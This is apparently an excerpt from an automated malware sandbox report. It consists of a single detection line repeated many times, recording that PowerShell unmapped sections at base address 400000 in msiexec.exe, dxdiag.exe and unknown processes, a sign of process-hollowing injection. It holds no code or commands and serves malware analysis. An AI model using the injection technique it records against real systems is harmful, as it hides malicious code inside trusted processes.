    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: C:\Windows\SysWOW64\msiexec.exe base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: C:\Windows\SysWOW64\msiexec.exe base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: C:\Windows\SysWOW64\dxdiag.exe base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: C:\Windows\SysWOW64\dxdiag.exe base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: C:\Windows\SysWOW64\dxdiag.exe base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: C:\Windows\SysWOW64\dxdiag.exe base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: C:\Windows\SysWOW64\dxdiag.exe base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: C:\Windows\SysWOW64\dxdiag.exe base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: C:\Windows\SysWOW64\dxdiag.exe base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
